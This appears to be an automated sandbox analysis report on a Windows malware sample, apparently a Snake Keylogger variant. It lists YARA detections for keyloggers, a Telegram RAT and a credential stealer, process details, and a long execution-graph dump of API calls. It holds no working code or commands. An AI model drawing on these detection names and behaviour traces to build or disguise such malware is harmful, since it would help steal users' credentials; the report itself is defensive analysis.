                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:10:57:32
                                                                                                                  Start date:14/01/2025
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\supergroup\ageless.exe"
                                                                                                                  Imagebase:0x8f0000
                                                                                                                  File size:45'984 bytes
                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                    Signature Coverage:3.3%
                                                                                                                    Total number of Nodes:1652
                                                                                                                    Total number of Limit Nodes:30
                                                                                                                    execution_graph 95974 f11033 95979 f14c91 95974->95979 95978 f11042 95987 f1a961 95979->95987 95984 f14d9c 95985 f11038 95984->95985 95995 f151f7 22 API calls __fread_nolock 95984->95995 95986 f300a3 29 API calls __onexit 95985->95986 95986->95978 95996 f2fe0b 95987->95996 95989 f1a976 96006 f2fddb 95989->96006 95991 f14cff 95992 f13af0 95991->95992 96031 f13b1c 95992->96031 95995->95984 95998 f2fddb 95996->95998 95999 f2fdfa 95998->95999 96002 f2fdfc 95998->96002 96016 f3ea0c 95998->96016 96023 f34ead 7 API calls 2 library calls 95998->96023 95999->95989 96001 f3066d 96025 f332a4 RaiseException 96001->96025 96002->96001 96024 f332a4 RaiseException 96002->96024 96004 f3068a 96004->95989 96008 f2fde0 96006->96008 96007 f3ea0c ___std_exception_copy 21 API calls 96007->96008 96008->96007 96009 f2fdfa 96008->96009 96012 f2fdfc 96008->96012 96028 f34ead 7 API calls 2 library calls 96008->96028 96009->95991 96011 f3066d 96030 f332a4 RaiseException 96011->96030 96012->96011 96029 f332a4 RaiseException 96012->96029 96015 f3068a 96015->95991 96022 f43820 _abort 96016->96022 96017 f4385e 96027 f3f2d9 20 API calls _abort 96017->96027 96019 f43849 RtlAllocateHeap 96020 f4385c 96019->96020 96019->96022 96020->95998 96022->96017 96022->96019 96026 f34ead 7 API calls 2 library calls 96022->96026 96023->95998 96024->96001 96025->96004 96026->96022 96027->96020 96028->96008 96029->96011 96030->96015 96032 f13b0f 96031->96032 96033 f13b29 96031->96033 96032->95984 96033->96032 96034 f13b30 RegOpenKeyExW 96033->96034 96034->96032 96035 f13b4a RegQueryValueExW 96034->96035 96036 f13b80 RegCloseKey 96035->96036 96037 f13b6b 96035->96037 96036->96032 96037->96036 96038 f12e37 96039 f1a961 22 API calls 96038->96039 96040 f12e4d 96039->96040 96117 f14ae3 96040->96117 96042 f12e6b 96131 f13a5a 96042->96131 96044 f12e7f 96138 f19cb3 96044->96138 96049 f52cb0 96186 f82cf9 96049->96186 96050 f12ead 96166 f1a8c7 96050->96166 96052 f52cc3 96053 f52ccf 96052->96053 96212 f14f39 96052->96212 96058 f14f39 68 API calls 96053->96058 96056 f12ec3 96170 f16f88 22 API calls 96056->96170 96060 f52ce5 96058->96060 96059 f12ecf 96061 f19cb3 22 API calls 96059->96061 96218 f13084 22 API calls 96060->96218 96062 f12edc 96061->96062 96171 f1a81b 41 API calls 96062->96171 96064 f12eec 96067 f19cb3 22 API calls 96064->96067 96066 f52d02 96219 f13084 22 API calls 96066->96219 96069 f12f12 96067->96069 96172 f1a81b 41 API calls 96069->96172 96070 f52d1e 96072 f13a5a 24 API calls 96070->96072 96073 f52d44 96072->96073 96220 f13084 22 API calls 96073->96220 96074 f12f21 96077 f1a961 22 API calls 96074->96077 96076 f52d50 96078 f1a8c7 22 API calls 96076->96078 96079 f12f3f 96077->96079 96080 f52d5e 96078->96080 96173 f13084 22 API calls 96079->96173 96221 f13084 22 API calls 96080->96221 96083 f12f4b 96174 f34a28 40 API calls 3 library calls 96083->96174 96085 f52d6d 96089 f1a8c7 22 API calls 96085->96089 96086 f12f59 96086->96060 96087 f12f63 96086->96087 96175 f34a28 40 API calls 3 library calls 96087->96175 96091 f52d83 96089->96091 96090 f12f6e 96090->96066 96093 f12f78 96090->96093 96222 f13084 22 API calls 96091->96222 96176 f34a28 40 API calls 3 library calls 96093->96176 96094 f52d90 96096 f12f83 96096->96070 96097 f12f8d 96096->96097 96177 f34a28 40 API calls 3 library calls 96097->96177 96099 f12f98 96100 f12fdc 96099->96100 96178 f13084 22 API calls 96099->96178 96100->96085 96101 f12fe8 96100->96101 96101->96094 96180 f163eb 22 API calls 96101->96180 96104 f12fbf 96105 f1a8c7 22 API calls 96104->96105 96107 f12fcd 96105->96107 96106 f12ff8 96181 f16a50 22 API calls 96106->96181 96179 f13084 22 API calls 96107->96179 96110 f13006 96182 f170b0 23 API calls 96110->96182 96112 f13021 96115 f13065 96112->96115 96183 f16f88 22 API calls 96112->96183 96184 f170b0 23 API calls 96112->96184 96185 f13084 22 API calls 96112->96185 96118 f14af0 __wsopen_s 96117->96118 96120 f14b22 96118->96120 96226 f16b57 96118->96226 96130 f14b58 96120->96130 96223 f14c6d 96120->96223 96122 f19cb3 22 API calls 96124 f14c52 96122->96124 96123 f19cb3 22 API calls 96123->96130 96125 f1515f 22 API calls 96124->96125 96128 f14c5e 96125->96128 96126 f14c6d 22 API calls 96126->96130 96128->96042 96129 f14c29 96129->96122 96129->96128 96130->96123 96130->96126 96130->96129 96238 f1515f 96130->96238 96255 f51f50 96131->96255 96134 f19cb3 22 API calls 96135 f13a8d 96134->96135 96257 f13aa2 96135->96257 96137 f13a97 96137->96044 96139 f19cc2 _wcslen 96138->96139 96140 f2fe0b 22 API calls 96139->96140 96141 f19cea __fread_nolock 96140->96141 96142 f2fddb 22 API calls 96141->96142 96143 f12e8c 96142->96143 96144 f14ecb 96143->96144 96277 f14e90 LoadLibraryA 96144->96277 96149 f14ef6 LoadLibraryExW 96285 f14e59 LoadLibraryA 96149->96285 96150 f53ccf 96151 f14f39 68 API calls 96150->96151 96153 f53cd6 96151->96153 96156 f14e59 3 API calls 96153->96156 96158 f53cde 96156->96158 96157 f14f20 96157->96158 96159 f14f2c 96157->96159 96307 f150f5 96158->96307 96160 f14f39 68 API calls 96159->96160 96162 f12ea5 96160->96162 96162->96049 96162->96050 96165 f53d05 96167 f1a8db 96166->96167 96169 f1a8ea __fread_nolock 96166->96169 96168 f2fe0b 22 API calls 96167->96168 96167->96169 96168->96169 96169->96056 96170->96059 96171->96064 96172->96074 96173->96083 96174->96086 96175->96090 96176->96096 96177->96099 96178->96104 96179->96100 96180->96106 96181->96110 96182->96112 96183->96112 96184->96112 96185->96112 96187 f82d15 96186->96187 96188 f1511f 64 API calls 96187->96188 96189 f82d29 96188->96189 96457 f82e66 96189->96457 96192 f82d3f 96192->96052 96193 f150f5 40 API calls 96194 f82d56 96193->96194 96195 f150f5 40 API calls 96194->96195 96196 f82d66 96195->96196 96197 f150f5 40 API calls 96196->96197 96198 f82d81 96197->96198 96199 f150f5 40 API calls 96198->96199 96200 f82d9c 96199->96200 96201 f1511f 64 API calls 96200->96201 96202 f82db3 96201->96202 96203 f3ea0c ___std_exception_copy 21 API calls 96202->96203 96204 f82dba 96203->96204 96205 f3ea0c ___std_exception_copy 21 API calls 96204->96205 96206 f82dc4 96205->96206 96207 f150f5 40 API calls 96206->96207 96208 f82dd8 96207->96208 96209 f828fe 27 API calls 96208->96209 96210 f82dee 96209->96210 96210->96192 96463 f822ce 96210->96463 96213 f14f43 96212->96213 96215 f14f4a 96212->96215 96214 f3e678 67 API calls 96213->96214 96214->96215 96216 f14f59 96215->96216 96217 f14f6a FreeLibrary 96215->96217 96216->96053 96217->96216 96218->96066 96219->96070 96220->96076 96221->96085 96222->96094 96244 f1aec9 96223->96244 96225 f14c78 96225->96120 96227 f54ba1 96226->96227 96230 f16b67 _wcslen 96226->96230 96251 f193b2 96227->96251 96229 f54baa 96229->96229 96231 f16ba2 96230->96231 96232 f16b7d 96230->96232 96233 f2fddb 22 API calls 96231->96233 96250 f16f34 22 API calls 96232->96250 96235 f16bae 96233->96235 96237 f2fe0b 22 API calls 96235->96237 96236 f16b85 __fread_nolock 96236->96120 96237->96236 96239 f1516e 96238->96239 96243 f1518f __fread_nolock 96238->96243 96242 f2fe0b 22 API calls 96239->96242 96240 f2fddb 22 API calls 96241 f151a2 96240->96241 96241->96130 96242->96243 96243->96240 96245 f1aed9 __fread_nolock 96244->96245 96246 f1aedc 96244->96246 96245->96225 96247 f2fddb 22 API calls 96246->96247 96248 f1aee7 96247->96248 96249 f2fe0b 22 API calls 96248->96249 96249->96245 96250->96236 96252 f193c0 96251->96252 96253 f193c9 __fread_nolock 96251->96253 96252->96253 96254 f1aec9 22 API calls 96252->96254 96253->96229 96253->96253 96254->96253 96256 f13a67 GetModuleFileNameW 96255->96256 96256->96134 96258 f51f50 __wsopen_s 96257->96258 96259 f13aaf GetFullPathNameW 96258->96259 96260 f13ae9 96259->96260 96261 f13ace 96259->96261 96271 f1a6c3 96260->96271 96262 f16b57 22 API calls 96261->96262 96264 f13ada 96262->96264 96267 f137a0 96264->96267 96268 f137ae 96267->96268 96269 f193b2 22 API calls 96268->96269 96270 f137c2 96269->96270 96270->96137 96272 f1a6d0 96271->96272 96273 f1a6dd 96271->96273 96272->96264 96274 f2fddb 22 API calls 96273->96274 96275 f1a6e7 96274->96275 96276 f2fe0b 22 API calls 96275->96276 96276->96272 96278 f14ec6 96277->96278 96279 f14ea8 GetProcAddress 96277->96279 96282 f3e5eb 96278->96282 96280 f14eb8 96279->96280 96280->96278 96281 f14ebf FreeLibrary 96280->96281 96281->96278 96315 f3e52a 96282->96315 96284 f14eea 96284->96149 96284->96150 96286 f14e8d 96285->96286 96287 f14e6e GetProcAddress 96285->96287 96290 f14f80 96286->96290 96288 f14e7e 96287->96288 96288->96286 96289 f14e86 FreeLibrary 96288->96289 96289->96286 96291 f2fe0b 22 API calls 96290->96291 96292 f14f95 96291->96292 96383 f15722 96292->96383 96294 f14fa1 __fread_nolock 96295 f150a5 96294->96295 96296 f53d1d 96294->96296 96306 f14fdc 96294->96306 96386 f142a2 CreateStreamOnHGlobal 96295->96386 96397 f8304d 74 API calls 96296->96397 96299 f53d22 96301 f1511f 64 API calls 96299->96301 96300 f150f5 40 API calls 96300->96306 96302 f53d45 96301->96302 96303 f150f5 40 API calls 96302->96303 96305 f1506e messages 96303->96305 96305->96157 96306->96299 96306->96300 96306->96305 96392 f1511f 96306->96392 96308 f53d70 96307->96308 96309 f15107 96307->96309 96419 f3e8c4 96309->96419 96312 f828fe 96440 f8274e 96312->96440 96314 f82919 96314->96165 96317 f3e536 CallCatchBlock 96315->96317 96316 f3e544 96340 f3f2d9 20 API calls _abort 96316->96340 96317->96316 96320 f3e574 96317->96320 96319 f3e549 96341 f427ec 26 API calls __wsopen_s 96319->96341 96322 f3e586 96320->96322 96323 f3e579 96320->96323 96332 f48061 96322->96332 96342 f3f2d9 20 API calls _abort 96323->96342 96326 f3e58f 96327 f3e5a2 96326->96327 96328 f3e595 96326->96328 96344 f3e5d4 LeaveCriticalSection __fread_nolock 96327->96344 96343 f3f2d9 20 API calls _abort 96328->96343 96329 f3e554 __wsopen_s 96329->96284 96333 f4806d CallCatchBlock 96332->96333 96345 f42f5e EnterCriticalSection 96333->96345 96335 f4807b 96346 f480fb 96335->96346 96339 f480ac __wsopen_s 96339->96326 96340->96319 96341->96329 96342->96329 96343->96329 96344->96329 96345->96335 96352 f4811e 96346->96352 96347 f48088 96359 f480b7 96347->96359 96348 f48177 96364 f44c7d 96348->96364 96352->96347 96352->96348 96362 f3918d EnterCriticalSection 96352->96362 96363 f391a1 LeaveCriticalSection 96352->96363 96354 f48189 96354->96347 96377 f43405 11 API calls 2 library calls 96354->96377 96356 f481a8 96378 f3918d EnterCriticalSection 96356->96378 96382 f42fa6 LeaveCriticalSection 96359->96382 96361 f480be 96361->96339 96362->96352 96363->96352 96365 f44c8a _abort 96364->96365 96366 f44cca 96365->96366 96367 f44cb5 RtlAllocateHeap 96365->96367 96379 f34ead 7 API calls 2 library calls 96365->96379 96380 f3f2d9 20 API calls _abort 96366->96380 96367->96365 96368 f44cc8 96367->96368 96371 f429c8 96368->96371 96372 f429fc __dosmaperr 96371->96372 96373 f429d3 RtlFreeHeap 96371->96373 96372->96354 96373->96372 96374 f429e8 96373->96374 96381 f3f2d9 20 API calls _abort 96374->96381 96376 f429ee GetLastError 96376->96372 96377->96356 96378->96347 96379->96365 96380->96368 96381->96376 96382->96361 96384 f2fddb 22 API calls 96383->96384 96385 f15734 96384->96385 96385->96294 96387 f142bc FindResourceExW 96386->96387 96391 f142d9 96386->96391 96388 f535ba LoadResource 96387->96388 96387->96391 96389 f535cf SizeofResource 96388->96389 96388->96391 96390 f535e3 LockResource 96389->96390 96389->96391 96390->96391 96391->96306 96393 f53d90 96392->96393 96394 f1512e 96392->96394 96398 f3ece3 96394->96398 96397->96299 96401 f3eaaa 96398->96401 96400 f1513c 96400->96306 96405 f3eab6 CallCatchBlock 96401->96405 96402 f3eac2 96414 f3f2d9 20 API calls _abort 96402->96414 96404 f3eae8 96416 f3918d EnterCriticalSection 96404->96416 96405->96402 96405->96404 96406 f3eac7 96415 f427ec 26 API calls __wsopen_s 96406->96415 96409 f3eaf4 96417 f3ec0a 62 API calls 2 library calls 96409->96417 96411 f3eb08 96418 f3eb27 LeaveCriticalSection __fread_nolock 96411->96418 96413 f3ead2 __wsopen_s 96413->96400 96414->96406 96415->96413 96416->96409 96417->96411 96418->96413 96422 f3e8e1 96419->96422 96421 f15118 96421->96312 96423 f3e8ed CallCatchBlock 96422->96423 96424 f3e900 ___scrt_fastfail 96423->96424 96425 f3e92d 96423->96425 96426 f3e925 __wsopen_s 96423->96426 96435 f3f2d9 20 API calls _abort 96424->96435 96437 f3918d EnterCriticalSection 96425->96437 96426->96421 96429 f3e937 96438 f3e6f8 38 API calls 4 library calls 96429->96438 96430 f3e91a 96436 f427ec 26 API calls __wsopen_s 96430->96436 96433 f3e94e 96439 f3e96c LeaveCriticalSection __fread_nolock 96433->96439 96435->96430 96436->96426 96437->96429 96438->96433 96439->96426 96443 f3e4e8 96440->96443 96442 f8275d 96442->96314 96446 f3e469 96443->96446 96445 f3e505 96445->96442 96447 f3e478 96446->96447 96448 f3e48c 96446->96448 96454 f3f2d9 20 API calls _abort 96447->96454 96452 f3e488 __alldvrm 96448->96452 96456 f4333f 11 API calls 2 library calls 96448->96456 96451 f3e47d 96455 f427ec 26 API calls __wsopen_s 96451->96455 96452->96445 96454->96451 96455->96452 96456->96452 96462 f82e7a 96457->96462 96458 f82d3b 96458->96192 96458->96193 96459 f150f5 40 API calls 96459->96462 96460 f828fe 27 API calls 96460->96462 96461 f1511f 64 API calls 96461->96462 96462->96458 96462->96459 96462->96460 96462->96461 96464 f822e7 96463->96464 96465 f822d9 96463->96465 96467 f8232c 96464->96467 96468 f3e5eb 29 API calls 96464->96468 96469 f822f0 96464->96469 96466 f3e5eb 29 API calls 96465->96466 96466->96464 96492 f82557 40 API calls __fread_nolock 96467->96492 96470 f82311 96468->96470 96469->96192 96470->96467 96472 f8231a 96470->96472 96472->96469 96500 f3e678 96472->96500 96473 f82370 96474 f82374 96473->96474 96475 f82395 96473->96475 96479 f3e678 67 API calls 96474->96479 96483 f82381 96474->96483 96493 f82171 96475->96493 96478 f8239d 96481 f823c3 96478->96481 96482 f823a3 96478->96482 96479->96483 96480 f3e678 67 API calls 96480->96469 96513 f823f3 74 API calls 96481->96513 96485 f823b0 96482->96485 96486 f3e678 67 API calls 96482->96486 96483->96469 96483->96480 96485->96469 96487 f3e678 67 API calls 96485->96487 96486->96485 96487->96469 96488 f823de 96488->96469 96491 f3e678 67 API calls 96488->96491 96489 f823ca 96489->96488 96490 f3e678 67 API calls 96489->96490 96490->96488 96491->96469 96492->96473 96494 f3ea0c ___std_exception_copy 21 API calls 96493->96494 96495 f8217f 96494->96495 96496 f3ea0c ___std_exception_copy 21 API calls 96495->96496 96497 f82190 96496->96497 96498 f3ea0c ___std_exception_copy 21 API calls 96497->96498 96499 f8219c 96498->96499 96499->96478 96501 f3e684 CallCatchBlock 96500->96501 96502 f3e695 96501->96502 96503 f3e6aa 96501->96503 96531 f3f2d9 20 API calls _abort 96502->96531 96512 f3e6a5 __wsopen_s 96503->96512 96514 f3918d EnterCriticalSection 96503->96514 96506 f3e69a 96532 f427ec 26 API calls __wsopen_s 96506->96532 96507 f3e6c6 96515 f3e602 96507->96515 96510 f3e6d1 96533 f3e6ee LeaveCriticalSection __fread_nolock 96510->96533 96512->96469 96513->96489 96514->96507 96516 f3e624 96515->96516 96517 f3e60f 96515->96517 96521 f3e61f 96516->96521 96534 f3dc0b 96516->96534 96566 f3f2d9 20 API calls _abort 96517->96566 96520 f3e614 96567 f427ec 26 API calls __wsopen_s 96520->96567 96521->96510 96527 f3e646 96551 f4862f 96527->96551 96530 f429c8 _free 20 API calls 96530->96521 96531->96506 96532->96512 96533->96512 96535 f3dc1f 96534->96535 96536 f3dc23 96534->96536 96540 f44d7a 96535->96540 96536->96535 96537 f3d955 __fread_nolock 26 API calls 96536->96537 96538 f3dc43 96537->96538 96568 f459be 62 API calls 3 library calls 96538->96568 96541 f3e640 96540->96541 96542 f44d90 96540->96542 96544 f3d955 96541->96544 96542->96541 96543 f429c8 _free 20 API calls 96542->96543 96543->96541 96545 f3d961 96544->96545 96546 f3d976 96544->96546 96569 f3f2d9 20 API calls _abort 96545->96569 96546->96527 96548 f3d966 96570 f427ec 26 API calls __wsopen_s 96548->96570 96550 f3d971 96550->96527 96552 f48653 96551->96552 96553 f4863e 96551->96553 96555 f4868e 96552->96555 96559 f4867a 96552->96559 96574 f3f2c6 20 API calls _abort 96553->96574 96576 f3f2c6 20 API calls _abort 96555->96576 96556 f48643 96575 f3f2d9 20 API calls _abort 96556->96575 96571 f48607 96559->96571 96560 f48693 96577 f3f2d9 20 API calls _abort 96560->96577 96563 f4869b 96578 f427ec 26 API calls __wsopen_s 96563->96578 96564 f3e64c 96564->96521 96564->96530 96566->96520 96567->96521 96568->96535 96569->96548 96570->96550 96579 f48585 96571->96579 96573 f4862b 96573->96564 96574->96556 96575->96564 96576->96560 96577->96563 96578->96564 96580 f48591 CallCatchBlock 96579->96580 96590 f45147 EnterCriticalSection 96580->96590 96582 f4859f 96583 f485c6 96582->96583 96584 f485d1 96582->96584 96591 f486ae 96583->96591 96606 f3f2d9 20 API calls _abort 96584->96606 96587 f485cc 96607 f485fb LeaveCriticalSection __wsopen_s 96587->96607 96589 f485ee __wsopen_s 96589->96573 96590->96582 96608 f453c4 96591->96608 96593 f486c4 96621 f45333 21 API calls 2 library calls 96593->96621 96595 f486be 96595->96593 96597 f453c4 __wsopen_s 26 API calls 96595->96597 96605 f486f6 96595->96605 96596 f4871c 96604 f4873e 96596->96604 96622 f3f2a3 20 API calls __dosmaperr 96596->96622 96600 f486ed 96597->96600 96598 f453c4 __wsopen_s 26 API calls 96599 f48702 CloseHandle 96598->96599 96599->96593 96601 f4870e GetLastError 96599->96601 96603 f453c4 __wsopen_s 26 API calls 96600->96603 96601->96593 96603->96605 96604->96587 96605->96593 96605->96598 96606->96587 96607->96589 96609 f453e6 96608->96609 96610 f453d1 96608->96610 96616 f4540b 96609->96616 96625 f3f2c6 20 API calls _abort 96609->96625 96623 f3f2c6 20 API calls _abort 96610->96623 96613 f453d6 96624 f3f2d9 20 API calls _abort 96613->96624 96614 f45416 96626 f3f2d9 20 API calls _abort 96614->96626 96616->96595 96618 f453de 96618->96595 96619 f4541e 96627 f427ec 26 API calls __wsopen_s 96619->96627 96621->96596 96622->96604 96623->96613 96624->96618 96625->96614 96626->96619 96627->96618 96628 f13156 96631 f13170 96628->96631 96632 f13187 96631->96632 96633 f131eb 96632->96633 96634 f1318c 96632->96634 96675 f131e9 96632->96675 96636 f131f1 96633->96636 96637 f52dfb 96633->96637 96638 f13265 PostQuitMessage 96634->96638 96639 f13199 96634->96639 96635 f131d0 DefWindowProcW 96640 f1316a 96635->96640 96641 f131f8 96636->96641 96642 f1321d SetTimer RegisterWindowMessageW 96636->96642 96680 f118e2 10 API calls 96637->96680 96638->96640 96644 f131a4 96639->96644 96645 f52e7c 96639->96645 96647 f13201 KillTimer 96641->96647 96648 f52d9c 96641->96648 96642->96640 96650 f13246 CreatePopupMenu I_RpcFreeBuffer 96642->96650 96651 f52e68 96644->96651 96652 f131ae 96644->96652 96695 f7bf30 34 API calls ___scrt_fastfail 96645->96695 96676 f130f2 Shell_NotifyIconW ___scrt_fastfail 96647->96676 96657 f52dd7 MoveWindow 96648->96657 96658 f52da1 96648->96658 96649 f52e1c 96681 f2e499 42 API calls 96649->96681 96653 f13253 96650->96653 96694 f7c161 27 API calls ___scrt_fastfail 96651->96694 96654 f52e4d 96652->96654 96655 f131b9 96652->96655 96678 f1326f 44 API calls ___scrt_fastfail 96653->96678 96654->96635 96693 f70ad7 22 API calls 96654->96693 96655->96653 96662 f131c4 96655->96662 96656 f52e8e 96656->96635 96656->96640 96657->96640 96664 f52da7 96658->96664 96665 f52dc6 SetFocus 96658->96665 96662->96635 96682 f130f2 Shell_NotifyIconW ___scrt_fastfail 96662->96682 96664->96662 96668 f52db0 96664->96668 96665->96640 96666 f13214 96677 f13c50 DeleteObject DestroyWindow 96666->96677 96667 f13263 96667->96640 96679 f118e2 10 API calls 96668->96679 96673 f52e41 96683 f13837 96673->96683 96675->96635 96676->96666 96677->96640 96678->96667 96679->96640 96680->96649 96681->96662 96682->96673 96684 f13862 ___scrt_fastfail 96683->96684 96696 f14212 96684->96696 96688 f53386 Shell_NotifyIconW 96689 f13906 Shell_NotifyIconW 96700 f13923 96689->96700 96690 f138e8 96690->96688 96690->96689 96692 f1391c 96692->96675 96693->96675 96694->96667 96695->96656 96697 f535a4 96696->96697 96698 f138b7 96696->96698 96697->96698 96699 f535ad DestroyIcon 96697->96699 96698->96690 96722 f7c874 42 API calls _strftime 96698->96722 96699->96698 96701 f13a13 96700->96701 96702 f1393f 96700->96702 96701->96692 96723 f16270 96702->96723 96705 f53393 LoadStringW 96708 f533ad 96705->96708 96706 f1395a 96707 f16b57 22 API calls 96706->96707 96709 f1396f 96707->96709 96712 f1a8c7 22 API calls 96708->96712 96716 f13994 ___scrt_fastfail 96708->96716 96710 f533c9 96709->96710 96711 f1397c 96709->96711 96714 f16350 22 API calls 96710->96714 96711->96708 96713 f13986 96711->96713 96712->96716 96728 f16350 96713->96728 96717 f533d7 96714->96717 96719 f139f9 Shell_NotifyIconW 96716->96719 96717->96716 96737 f133c6 96717->96737 96719->96701 96720 f533f9 96721 f133c6 22 API calls 96720->96721 96721->96716 96722->96690 96724 f2fe0b 22 API calls 96723->96724 96725 f16295 96724->96725 96726 f2fddb 22 API calls 96725->96726 96727 f1394d 96726->96727 96727->96705 96727->96706 96729 f16362 96728->96729 96730 f54a51 96728->96730 96746 f16373 96729->96746 96756 f14a88 22 API calls __fread_nolock 96730->96756 96733 f1636e 96733->96716 96734 f54a5b 96735 f54a67 96734->96735 96736 f1a8c7 22 API calls 96734->96736 96736->96735 96738 f133dd 96737->96738 96739 f530bb 96737->96739 96762 f133ee 96738->96762 96741 f2fddb 22 API calls 96739->96741 96743 f530c5 _wcslen 96741->96743 96742 f133e8 96742->96720 96744 f2fe0b 22 API calls 96743->96744 96745 f530fe __fread_nolock 96744->96745 96747 f163b6 __fread_nolock 96746->96747 96748 f16382 96746->96748 96747->96733 96748->96747 96749 f54a82 96748->96749 96750 f163a9 96748->96750 96752 f2fddb 22 API calls 96749->96752 96757 f1a587 96750->96757 96753 f54a91 96752->96753 96754 f2fe0b 22 API calls 96753->96754 96755 f54ac5 __fread_nolock 96754->96755 96756->96734 96758 f1a59d 96757->96758 96761 f1a598 __fread_nolock 96757->96761 96759 f2fe0b 22 API calls 96758->96759 96760 f5f80f 96758->96760 96759->96761 96761->96747 96763 f133fe _wcslen 96762->96763 96764 f13411 96763->96764 96765 f5311d 96763->96765 96766 f1a587 22 API calls 96764->96766 96767 f2fddb 22 API calls 96765->96767 96768 f1341e __fread_nolock 96766->96768 96769 f53127 96767->96769 96768->96742 96770 f2fe0b 22 API calls 96769->96770 96771 f53157 __fread_nolock 96770->96771 96772 f303fb 96773 f30407 CallCatchBlock 96772->96773 96801 f2feb1 96773->96801 96775 f30561 96828 f3083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96775->96828 96776 f3040e 96776->96775 96779 f30438 96776->96779 96778 f30568 96829 f34e52 28 API calls _abort 96778->96829 96789 f30477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96779->96789 96812 f4247d 96779->96812 96781 f3056e 96830 f34e04 28 API calls _abort 96781->96830 96785 f30576 96786 f30457 96788 f304d8 96820 f30959 96788->96820 96789->96788 96824 f34e1a 38 API calls 2 library calls 96789->96824 96792 f304de 96793 f304f3 96792->96793 96825 f30992 GetModuleHandleW 96793->96825 96795 f304fa 96795->96778 96796 f304fe 96795->96796 96797 f30507 96796->96797 96826 f34df5 28 API calls _abort 96796->96826 96827 f30040 13 API calls 2 library calls 96797->96827 96800 f3050f 96800->96786 96802 f2feba 96801->96802 96831 f30698 IsProcessorFeaturePresent 96802->96831 96804 f2fec6 96832 f32c94 10 API calls 3 library calls 96804->96832 96806 f2fecb 96811 f2fecf 96806->96811 96833 f42317 96806->96833 96809 f2fee6 96809->96776 96811->96776 96813 f42494 96812->96813 96814 f30a8c _ValidateLocalCookies 5 API calls 96813->96814 96815 f30451 96814->96815 96815->96786 96816 f42421 96815->96816 96817 f42450 96816->96817 96818 f30a8c _ValidateLocalCookies 5 API calls 96817->96818 96819 f42479 96818->96819 96819->96789 96892 f32340 96820->96892 96823 f3097f 96823->96792 96824->96788 96825->96795 96826->96797 96827->96800 96828->96778 96829->96781 96830->96785 96831->96804 96832->96806 96837 f4d1f6 96833->96837 96836 f32cbd 8 API calls 3 library calls 96836->96811 96840 f4d213 96837->96840 96841 f4d20f 96837->96841 96839 f2fed8 96839->96809 96839->96836 96840->96841 96843 f44bfb 96840->96843 96855 f30a8c 96841->96855 96844 f44c07 CallCatchBlock 96843->96844 96862 f42f5e EnterCriticalSection 96844->96862 96846 f44c0e 96863 f450af 96846->96863 96848 f44c1d 96854 f44c2c 96848->96854 96876 f44a8f 29 API calls 96848->96876 96851 f44c27 96877 f44b45 GetStdHandle GetFileType 96851->96877 96852 f44c3d __wsopen_s 96852->96840 96878 f44c48 LeaveCriticalSection _abort 96854->96878 96856 f30a97 IsProcessorFeaturePresent 96855->96856 96857 f30a95 96855->96857 96859 f30c5d 96856->96859 96857->96839 96891 f30c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96859->96891 96861 f30d40 96861->96839 96862->96846 96864 f450bb CallCatchBlock 96863->96864 96865 f450df 96864->96865 96866 f450c8 96864->96866 96879 f42f5e EnterCriticalSection 96865->96879 96887 f3f2d9 20 API calls _abort 96866->96887 96869 f450cd 96888 f427ec 26 API calls __wsopen_s 96869->96888 96871 f450eb 96875 f45117 96871->96875 96880 f45000 96871->96880 96873 f450d7 __wsopen_s 96873->96848 96889 f4513e LeaveCriticalSection _abort 96875->96889 96876->96851 96877->96854 96878->96852 96879->96871 96881 f44c7d _abort 20 API calls 96880->96881 96882 f45012 96881->96882 96886 f4501f 96882->96886 96890 f43405 11 API calls 2 library calls 96882->96890 96883 f429c8 _free 20 API calls 96884 f45071 96883->96884 96884->96871 96886->96883 96887->96869 96888->96873 96889->96873 96890->96882 96891->96861 96893 f3096c GetStartupInfoW 96892->96893 96893->96823 96894 f11098 96899 f142de 96894->96899 96898 f110a7 96900 f1a961 22 API calls 96899->96900 96901 f142f5 GetVersionExW 96900->96901 96902 f16b57 22 API calls 96901->96902 96903 f14342 96902->96903 96904 f193b2 22 API calls 96903->96904 96909 f14378 96903->96909 96905 f1436c 96904->96905 96907 f137a0 22 API calls 96905->96907 96906 f1441b GetCurrentProcess 